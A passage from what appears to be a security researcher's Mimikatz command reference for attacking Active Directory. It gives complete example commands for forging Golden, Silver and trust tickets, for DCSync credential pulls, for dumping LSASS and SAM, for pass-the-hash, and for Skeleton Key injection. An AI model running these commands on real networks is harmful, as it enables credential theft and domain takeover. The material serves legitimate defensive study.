Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the\r\nAD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources.\r\nThe Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using\r\nthe domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account.\r\nTo summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT)\r\nthat provide access to anything in AD at any time.\r\nMimikatz Golden Ticket Command Reference:\r\nThe Mimikatz command to create a golden ticket is “kerberos::golden”\r\n/domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.\r\n/sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.\r\n/sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof.\r\nTypically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419-\r\n774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter.\r\n/user – username to impersonate\r\n/groups (optional) – group RIDs the user is a member of (the first is the primary group).\r\nAdd user or computer account RIDs to receive the same access.\r\nDefault Groups: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).\r\n/krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign\r\nthe TGT.\r\n/ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to\r\nimmediately inject the golden ticket into memory for use.\r\n/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.\r\n/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).\r\n/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is\r\nused). Mimikatz Default value is 0.\r\n/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active\r\nDirectory default Kerberos policy setting is 10 hours (600 minutes).\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 19 of 79\n\n/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years\r\n(~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).\r\n/sids (optional) – set to be the SID of the Enterprise Admins group in the AD forest\r\n([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in\r\nevery domain in the AD Forest).\r\n/aes128 – the AES128 key\r\n/aes256 – the AES256 key\r\nGolden Ticket Default Groups:\r\nDomain Users SID: S-1-5-21\u003cDOMAINID\u003e-513\r\nDomain Admins SID: S-1-5-21\u003cDOMAINID\u003e-512\r\nSchema Admins SID: S-1-5-21\u003cDOMAINID\u003e-518\r\nEnterprise Admins SID: S-1-5-21\u003cDOMAINID\u003e-519  (this is only effective when the forged ticket is\r\ncreated in the Forest root domain, though add using /sids parameter for AD forest admin rights)\r\nGroup Policy Creator Owners SID: S-1-5-21\u003cDOMAINID\u003e-520\r\nkerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID\r\n/sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt\r\nCommand Example:\r\n.\\mimikatz “kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-\r\n135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600\r\n/renewmax:10080 /ptt” exit\r\nGolden Ticket References:\r\n* Golden Tickets are now More Golden (with SID History)\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 20 of 79\n\nUpdate1/5/2016:\r\nIn early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently\r\npresented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was\r\nset to static values, usually containing the string “eo.oe”. As of the Mimikatz update dated 1/5/2016, forged\r\nKerberos tickets no longer include a domain anomaly since the netbios domain name is placed in the domain\r\ncomponent of the Kerberos ticket.\r\nMimikatz code diff:\r\nMore information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the\r\nin the Detecting Forged Kerberos Tickets section.\r\nSilver Ticket\r\nA Silver Ticket is a TGS (similar to TGT in format) using the target service account’s (identified by SPN\r\nmapping) NTLM password hash to encrypt and sign.\r\nThe Mimikatz command to create a silver ticket is “kerberos::golden” (yes, you run ‘golden’ to create silver\r\ntickets).\r\nMimikatz Silver Ticket Command Reference:\r\n/domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.\r\n/sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.\r\n/sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof.\r\nTypically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419-\r\n774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter.\r\n/user – username to impersonate\r\n/groups (optional) – group RIDs the user is a member of (the first is the primary group)\r\ndefault: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).\r\n/ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to\r\nimmediately inject the golden ticket into memory for use.\r\n/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.\r\n/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).\r\n/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is\r\nused). Mimikatz Default value is 0.\r\n/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active\r\nDirectory default Kerberos policy setting is 10 hours (600 minutes).\r\n/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years\r\n(~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).\r\n/aes128 – the AES128 key\r\n/aes256 – the AES256 key\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 21 of 79\n\nSilver Ticket Required Parameters:\r\n/target – the target server’s FQDN.\r\n/service – the kerberos service running on the target server. This is the Service Principal Name class (or\r\ntype) such as cifs, http, mssql.\r\n/rc4 – the NTLM hash for the service (computer account or user account)\r\nSilver Ticket Default Groups:\r\nDomain Users SID: S-1-5-21\u003cDOMAINID\u003e-513\r\nDomain Admins SID: S-1-5-21\u003cDOMAINID\u003e-512\r\nSchema Admins SID: S-1-5-21\u003cDOMAINID\u003e-518\r\nEnterprise Admins SID: S-1-5-21\u003cDOMAINID\u003e-519  (this is only effective when the forged ticket is\r\ncreated in the Forest root domain, though add using /sids parameter for AD forest admin rights)\r\nGroup Policy Creator Owners SID: S-1-5-21\u003cDOMAINID\u003e-520\r\nExample Mimikatz Command to Create a Silver Ticket:\r\nThe following Mimikatz command creates a Silver Ticket for the CIFS service on the server\r\nadsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer\r\naccount password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain\r\ndump or by running Mimikatz on the local system as shown above (Mimikatz “privilege::debug”\r\n“sekurlsa::logonpasswords” exit). The NTLM password hash is used with the /rc4 paramteer. The service SPN\r\ntype also needs to be identified in the /service parameter. Finally, the target computer’s fully-qualified domain\r\nname needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter.\r\nmimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-\r\n1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org\r\n/rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit\r\nTrust Ticket\r\nOnce the Active Directory Trust password hash is determined (Mimikatz “privilege::debug” “lsadump::trust\r\n/patch” exit), a trust ticket can be generated.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 22 of 79\n\nMore background on Trust Tickets.\r\nForging Internal AD Forest Trust Tickets\r\nIn this example, Trust tickets leverage two additional tools Benjamin Delpy wrote called AskTGS and Kirbikator.\r\nStep 1: Dumping trust passwords (trust keys)\r\nCurrent Mimikatz versions can extract the trust keys (passwords).\r\n*  Mimikatz “privilege::debug” “lsadump::trust /patch” exit\r\nStep 2: Create a forged trust ticket (inter-realm TGT) using Mimikatz\r\nForge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging\r\nSIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative\r\naccess from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is\r\neffectively a Golden Ticket across the trust.\r\nThe Mimikatz command to create a trust ticket is “kerberos::golden”\r\n/domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.\r\n/sid – the SID of the domain. In this example: “S-1-5-21-3677078698-724690114-1972670770”.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 23 of 79\n\n/sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof.\r\nTypically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1581655573-\r\n3923512380-696647894-519”. This parameter adds the provided SIDs to the SID History parameter.\r\n/user – username to impersonate\r\n/groups (optional) – group RIDs the user is a member of (the first is the primary group)\r\ndefault: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).\r\n/ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to\r\nimmediately inject the golden ticket into memory for use.\r\n/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.\r\n/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).\r\n/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is\r\nused). Mimikatz Default value is 0.\r\n/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active\r\nDirectory default Kerberos policy setting is 10 hours (600 minutes).\r\n/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years\r\n(~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).\r\n/aes128 – the AES128 key\r\n/aes256 – the AES256 key\r\nTrust Ticket Specific Required Parameters:\r\n/target – the target domain’s FQDN.\r\n/service – the kerberos service running in the target domain (krbtgt).\r\n/rc4 – the NTLM hash for the service kerberos service account (krbtgt).\r\n/ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately\r\ninject the golden ticket into memory for use.\r\nTrust Ticket Default Groups:\r\nDomain Users SID: S-1-5-21\u003cDOMAINID\u003e-513\r\nDomain Admins SID: S-1-5-21\u003cDOMAINID\u003e-512\r\nSchema Admins SID: S-1-5-21\u003cDOMAINID\u003e-518\r\nEnterprise Admins SID: S-1-5-21\u003cDOMAINID\u003e-519  (this is only effective when the forged ticket is\r\ncreated in the Forest root domain, though add using /sids parameter for AD forest admin rights)\r\nGroup Policy Creator Owners SID: S-1-5-21\u003cDOMAINID\u003e-520\r\nMimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770\r\n/sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd\r\n/user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\\temp\\tickets\\EA-ADSECLABCHILD.kirbi”\r\nexit\r\nNote: Using the /sids parameter will create a trust ticket for the target AD domain that says the holder is an\r\nEnterprise Admin.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 24 of 79\n\nNOTE: Mimikatz generates Silver Tickets with a hard-coded domain value which may appear in some events. It’s\r\nalso likely the domain field in logon/logoff events relating to a forged ticket will have anomalies when compared\r\nto valid Kerberos authentication.\r\nStep 3: Use the Trust Ticket file created in Step 2 to get a TGS for the targeted service in the destination\r\ndomain. Save the TGS to a file.\r\nThe resulting TGS provides EA access to the parent (root) domain’s Domain Controller by targeting the CIFS\r\nservice in this example (but it could target any).\r\nAsktgs c:\\temp\\tickets\\EA-ADSECLABCHILD.kirbi CIFS/ADSDC02.lab.adsecurity.org\r\nStep 4: Inject the TGS file created in Step 3 and then access the targeted service with the spoofed rights.\r\nKirbikator lsa c:\\temp\\tickets\\CIFS.ADSDC02.lab.adsecurity.org.kirbi\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 25 of 79\n\nKERBEROS::Hash – hash password to keys\r\nKERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it\r\nonly displays the current user’s tickets.\r\nSimilar to functionality of “klist”.\r\n/export – export user tickets to files.\r\nUse SEKURLSA::TICKETS to dump Kerberos tickets for all authenticated users on the system.\r\nNote that there are circumstances where the user certificates won’t export. This requires running\r\nSEKURLSA::Tickets /export (with appropriate privileges).\r\nKERBEROS::PTC – pass the cache (NT6)\r\n*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off\r\nand passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.\r\nA good example of Mimikatz’s kerberos::ptc is when exploiting MS14-068 with PyKEK. PyKEK generates a\r\nccache file which can be injected with Mimikatz using kerberos::ptc.\r\nKERBEROS::PTT – pass the ticket\r\nAfter a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively\r\nsimulating a logon without any communication with the Domain Controller. No special rights required.\r\nSimilar to SEKURLSA::PTH (Pass-The-Hash).\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 26 of 79\n\n/filename – the ticket’s filename (can be multiple)\r\n/diretory – a directory path, all .kirbi files inside will be injected.\r\nKERBEROS::Purge – purge all Kerberos tickets\r\nSimilar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the\r\ncorrect user context is used.\r\nKERBEROS::TGT – get current TGT for current user.\r\nLSADUMP\r\nThe LSADUMP Mimikatz Module interacts with the Windows Local Security Authority (LSA) to extract\r\ncredentials. Most of these commands require either debug rights (privlege::debug) or local System. By default, the\r\nAdministrators group has Debug rights. Debug still has to be “activated” by running “privilege::debug”.\r\nLSADUMP:Backupkeys\r\nRequires Administrator rights.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 27 of 79\n\nLSADUMP::Cache – Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)\r\nRequires Administrator rights.\r\nLSADUMP::ChangeNTLM – Ask a server to set a new password/ntlm for one user.\r\nLSADUMP::DCShadow – Push replication changes to a Domain Controller.  Read more at DCShadow.com.\r\nThis requires full AD admin rights or KRBTGT pw hash.\r\nDCShadow temporarily sets the computer to be a “DC” for the purposes of replication:\r\nCreates 2 objects in the AD forest Configuration partition.\r\nUpdates the SPN of the computer used to include “GC” (Global Catalog) and “E3514235-4B06-11D1-\r\nAB04-00C04FC2DCD2” (AD Replication). More info on Kerberos Service Principal Names in the\r\nADSecurity SPN section.\r\nPushes the updates to DCs via DrsReplicaAdd and KCC.\r\nRemoves the created objects from the Configuration partition.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 28 of 79\n\nhttps://adsecurity.org/?page_id=1821\r\nPage 29 of 79\n\nTemporary DC object in the Configuration partition\r\nLSADUMP::DCSync – ask a DC to synchronize an object (get password data for account)\r\nRequires membership in Domain Administrator, domain Administrators, or custom delegation.\r\nA major feature added to Mimkatz in August 2015 is “DCSync” which effectively “impersonates” a Domain\r\nController and requests account password data from the targeted Domain Controller. DCSync was written by\r\nBenjamin Delpy and Vincent Le Toux. As of Mimikatz version 2.1 alpha 20160501, DCSync works with renamed\r\ndomains.\r\nThe exploit method prior to DCSync was to run Mimikatz or Invoke-Mimikatz on a Domain Controller to get the\r\nKRBTGT password hash to create Golden Tickets. With Mimikatz’s DCSync and the appropriate rights, the\r\nattacker can pull the password hash, as well as previous password hashes, from a Domain Controller over the\r\nnetwork without requiring interactive logon or copying off the Active Directory database file (ntds.dit).\r\nSpecial rights are required to run DCSync. Any member of Administrators, Domain Admins, or Enterprise Admins\r\nas well as Domain Controller computer accounts are able to run DCSync to pull password data. Note that Read-Only Domain Controllers are not only allowed to pull password data for users by default.\r\nHow DCSync works:\r\n1. Discovers Domain Controller in the specified domain name.\r\n2. Requests the Domain Controller replicate the user credentials via GetNCChanges (leveraging Directory\r\nReplication Service (DRS) Remote Protocol)\r\nI have previously done some packet captures for Domain Controller replication and identified the intra-DC\r\ncommunication flow regarding how Domain Controllers replicate.\r\nThe Samba Wiki describes the DSGetNCChanges function:\r\n“The client DC sends a DSGetNCChanges request to the server when the first one wants to get AD objects\r\nupdates from the second one. The response contains a set of updates that the client has to apply to its NC replica.\r\n…\r\nWhen a DC receives a DSReplicaSync Request, then for each DC that it replicates from (stored in RepsFrom data\r\nstructure) it performs a replication cycle where it behaves like a client and makes DSGetNCChanges requests to\r\nthat DC. So it gets up-to-date AD objects from each of the DC’s which it replicates from.”\r\nDCSync Options:\r\n/all – DCSync pull data for the entire domain.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 30 of 79\n\n/user – user id or SID of the user you want to pull the data for.\r\n/domain (optional) – FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to\r\nconnect to. If this parameter is not provided, Mimikatz defaults to the current domain.\r\n/csv – export to csv\r\n/dc (optional) – Specify the Domain Controller you want DCSync to connect to and gather data.\r\nThere’s also a /guid parameter.\r\nDCSync Command Examples:\r\nPull password data for the KRBTGT user account in the rd.adsecurity.org domain:\r\nMimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt” exit\r\nPull password data for the Administrator user account in the rd.adsecurity.org domain:\r\nMimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator” exit\r\nPull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:\r\nMimikatz  “lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$” exit\r\nLSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use\r\n/patch for a subset of data, use /inject for everything. Requires System or Debug rights.\r\n/inject – Inject LSASS to extract credentials\r\n/name – account name for target user account\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 31 of 79\n\n/id – RID for target user account\r\n/patch – patch LSASS.\r\nOften service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged\r\non to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a\r\nDomain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to\r\ncreate Kerberos Golden Tickets.\r\nCommand:  mimikatz lsadump::lsa /inject exit\r\nDumps credential data in an Active Directory domain when run on a Domain Controller.\r\nRequires administrator access (with debug rights) or Local SYSTEM rights\r\nThe account with RID 502 is the KRBTGT account and the account with RID 500 is the default administrator for\r\nthe domain.\r\nHere’s the result when running LSADUMP::lsa /patch which only dumps the NTLM password hashes.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 32 of 79\n\nLSADUMP::NetSync\r\nNetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller\r\nvia a Silver Ticket and DCSync the target account’s information including the password data.\r\nLSADUMP::RpData\r\nLSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to\r\nthe local Security Account Manager (SAM) database and dumps credentials for local accounts.\r\nRequires System or Debug rights.\r\nIt contains NTLM, and sometimes LM hash, of users passwords. It can work in two modes: online (with SYSTEM\r\nuser or token) or offline (with SYSTEM \u0026 SAM hives or backup).\r\nRequires administrator access (with debug rights) or Local SYSTEM rights when run against an online SAM.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 33 of 79\n\nGetting an impersonated SYSTEM token: Mimikatz “PRIVILEGE::Debug” “TOKEN::elevate”\r\nLSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives).\r\nRequires System or Debug rights.\r\nLSADUMP::SetNTLM – Ask a server to set a new password/ntlm for one user.\r\nLSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).\r\nRequires System or Debug rights.\r\nExtracts data from Active Directory for existing trust relationships for the domain. The trust key (password) is\r\ndisplayed as well.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 34 of 79\n\nMISC\r\nThe MISC Mimikatz module is kind of a catch-all for commands that don’t quite fit elsewhere.\r\nThe most well known commands in this module are MISC::AddSID, MISC::MemSSP, and MISC::Skeleton.\r\nMISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is\r\nthe account/group name(s) (or SID).\r\nRequires System or Debug rights.\r\nNOTE: ADDSID has moved to the SID module in the 2.1 release branch.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 35 of 79\n\nMISC::Cmd – Command Prompt (without DisableCMD).\r\nRequires Administrator rights.\r\nMISC::Compressme – Compresses Mimikatz file to a new file called “mimikatz_x64.compressed”\r\nMISC::Detours – (experimental) Try to enumerate all modules with Detours-like hooks\r\nRequires Administrator rights.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 36 of 79\n\nMISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials by patching LSASS\r\nin memory with new SSP – no reboot required (rebooting clears the memssp Mimikatz injects). This post on\r\nMimikatz SSP describes in-memory patching as well as more persistent SSP techniques.\r\nRequires Administrator rights.\r\nMandiant presentation on MemSSP\r\nMISC::MFLT – Gathers details on loaded drivers, including driver altitude.\r\nAvailable starting with Mimikatz v2.1.1 (11/28/2017).\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 37 of 79\n\nMISC::Ncroutemon – Juniper Manager (without DisableTaskMgr)\r\nMISC::Regedit – Registry Editor (without DisableRegistryTools)\r\nRequires Administrator rights.\r\nMISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller.\r\nRequires Administrator rights.\r\nThis enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton\r\nKeys) as well as their usual password.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 38 of 79\n\nMISC::Taskmgr – Task Manager (without DisableTaskMgr).\r\nRequires Administrator rights.\r\nMISC::Wifi –\r\nNo longer in MISC. Likely moved to DPAPI:Wifi which may include similar functionality.\r\nMISC::WP\r\nMINESWEEPER\r\nMINESWEEPER::Infos – Provide mine info in minesweeper\r\nNet\r\nNET::Alias\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 39 of 79\n\nNET::Group\r\nNET::ServerInfo\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 40 of 79\n\nNET::Session\r\nNET::Share\r\nNET::Stats\r\nNET::TOD\r\nNET::User\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 41 of 79\n\nNET::WSession\r\nPRIVILEGE\r\nPRIVILEGE::Backup – get backup privilege/rights. Requires Debug rights.\r\nPRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands).\r\nBy default, the Administrators group has Debug rights. Debug still has to be “activated” by running\r\n“privilege::debug”.\r\nThe debug privilege allows someone to debug a process that they wouldn’t otherwise have access to. For example,\r\na process running as a user with the debug privilege enabled on its token can debug a service running as local\r\nsystem.\r\nhttp://msdn.microsoft.com/library/windows/hardware/ff541528.aspx\r\nBenjamin’s Remark:\r\nERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 means that the required privilege is not\r\nheld by the client (mostly you’re not an administrator :smirk:)\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 42 of 79\n\nPRIVILEGE::Driver – get driver privilege/rights. Requires Debug rights.\r\nPRIVILEGE::ID – get privilege/rights by its ID. Requires Debug rights.\r\nPRIVILEGE::Name – get privilege/rights by its name. Requires Debug rights.\r\nPRIVILEGE::Restore – get restore privilege/rights. Requires Debug rights.\r\nPRIVILEGE::Security – get security privilege/rights. Requires Debug rights.\r\nPRIVILEGE::SysEnv – get privilege/rights to manage system environment. Requires Debug rights.\r\nPRIVILEGE::TCB – get TCB privilege/rights(likely act as part of the operating system right). Requires elevated\r\nrights (still TBD).\r\nPROCESS\r\nThe Mimikatz PROCESS module provides the ability to gather data on processes and interact with processes.\r\nPROCESS::Exports – list exports\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 43 of 79\n\nPROCESS::Imports – list imports\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 44 of 79\n\nPROCESS::List – List running processes\r\nRequires Administrator rights.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 45 of 79\n\nPROCESS::Resume – resume a process\r\nPROCESS::Run –  Run\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 46 of 79\n\nPROCESS::Start – start a process\r\nPROCESS::Stop – terminate a process\r\nPROCESS::Suspend – suspend a process\r\nRPC\r\nThe RPC module provides remote control of mimikatz.\r\nRPC::Close\r\nRPC::Connect\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 47 of 79\n\nRPC::Enum\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 48 of 79\n\nRPC::Server\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 49 of 79\n\nSEKURLSA\r\nThe SEKURLSA Mimikatz module interacts with protected memory. This module extracts passwords, keys, pin\r\ncodes, tickets from the memory of lsass (Local Security Authority Subsystem Service).\r\nIn order to interact with LSASS, the Mimikatz process requires appropriate rights:\r\nAdministrator, to get debug privilege via “PRIVILEGE::Debug”\r\nSYSTEM rights (“TOKEN::elevate”)\r\nHowever, running against a dumped LSASS process file (i.e. LSASS.dmp), elevated rights are not required.\r\nSEKURLSA::Backupkeys – get preferred backup master keys\r\nSEKURLSA::Credman – List Credentials Manager\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 50 of 79\n\nSEKURLSA::Dpapi – list cached MasterKeys\r\nSEKURLSA::DpapiSystem – DPAPI_SYSTEM secret\r\nSEKURLSA::Ekeys – list Kerberos encryption keys\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 51 of 79\n\nSEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer\r\naccount)\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 52 of 79\n\nSEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data\r\nSEKURLSA::LiveSSP – Lists LiveSSP credentials\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 53 of 79\n\nSEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on\r\nuser and computer credentials.\r\nDumps password data in LSASS for currently logged on (or recently logged on) accounts as well as\r\nservices running under the context of user credentials.\r\nAccount passwords are stored in memory in a reversible manner. If they are in memory (prior to Windows\r\n8.1/Windows Server 2012 R2 they were), they are displayed. Windows 8.1/Windows Server 2012 R2\r\ndoesn’t store the account password in this manner in most cases. KB2871997 “back-ports” this security\r\ncapability to  Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012, though the\r\ncomputer needs additional configuration after applying KB2871997.\r\nRequires administrator access (with debug rights) or Local SYSTEM rights\r\nWindows Server 2008 R2 System (Password is shown).                                                \r\nhttps://adsecurity.org/?page_id=1821\r\nPage 54 of 79\n\nWindows Server 2012 R2 system – no cleartext password shown\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 55 of 79\n\nServices running with account credentials are also dumped using this command.\r\nNote that only services that are running (credentials in memory) can be dumped in this manner.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 56 of 79\n\nSEKURLSA::Minidump – switch to LSASS minidump process context\r\nThere are several different ways to dump LSASS:  procdump, PowerShell, Task Manager, etc.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 57 of 79\n\nNote that Minidumps need to be read using the same platform it was dumped from NT5 Win32 or NT5x64 or NT6\r\nWin32 or NT6 x64.\r\nAnother option is to dump the LSASS process with Task Manager\r\nSekurlsa::minidump can open the dump file.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 58 of 79\n\nSEKURLSA::MSV – List LM \u0026 NTLM credentials\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 59 of 79\n\nSEKURLSA::Process – switch to LSASS process context\r\nSEKURLSA::Pth – Pass-the-Hash and Over-Pass-the-Hash (aka pass the key).\r\nMimikatz can perform the well-known operation ‘Pass-The-Hash’ to run a process under another credentials with\r\nNTLM hash of the user’s password, instead of its real password. For this, it starts a process with a fake identity,\r\nthen replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real\r\npassword).\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 60 of 79\n\n/user – the username you want to impersonate, keep in mind that Administrator is not the only name for\r\nthis well-known account.\r\n/domain – the fully qualified domain name – without domain or in case of local user/admin, use computer\r\nor server name, workgroup or whatever.\r\n/rc4 or /ntlm – optional – the RC4 key / NTLM hash of the user’s password.\r\n/run – optional – the command line to run – default is: cmd to have a shell.\r\nBenjamin’s Remarks:\r\nThis command does not work with minidumps (nonsense);\r\nit requires elevated privileges (privilege::debug or SYSTEM account), unlike ‘Pass-The-Ticket’ which uses\r\none official API ;\r\nthis new version of ‘Pass-The-Hash’ replaces RC4 keys of Kerberos by the ntlm hash (and/or replaces AES\r\nkeys) – it permits to the Kerberos provider to ask TGT tickets! ;\r\nntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available\r\nor replaceable) ;\r\nAES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can\r\navoid ntlm hash.\r\nBenjamin’s post on overpass-the-hash.\r\nSEKURLSA::SSP – Lists SSP credentials\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 61 of 79\n\nSEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services\r\nrunning under the context of a user account and the local computer’s AD computer account.\r\nUnlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can\r\naccess tickets of others sessions (users).\r\n/export – optional – tickets are exported in .kirbi files. They start with user’s LUID and group number (0 =\r\nTGS, 1 = client ticket(?) and 2 = TGT)\r\nSimilar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data\r\nin memory on a system, including those belonging to an admin or service.\r\nThis is extremely useful if an attacker has compromised a web server configured for Kerberos delegation that\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 62 of 79\n\nusers access with a backend SQL server. This enables an attacker to capture and reuse all user tickets in memory\r\non that server.\r\nThe “kerberos::tickets” mimikatz command dumps the current logged-on user’s 